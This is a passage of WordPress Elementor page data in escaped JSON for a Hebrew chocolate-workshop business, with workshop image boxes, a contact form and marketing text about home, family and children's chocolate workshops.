\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"33\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"33\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"33\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\",\"success_message_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c65b0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6b8474\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30c64bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"56c7701\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd.<br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 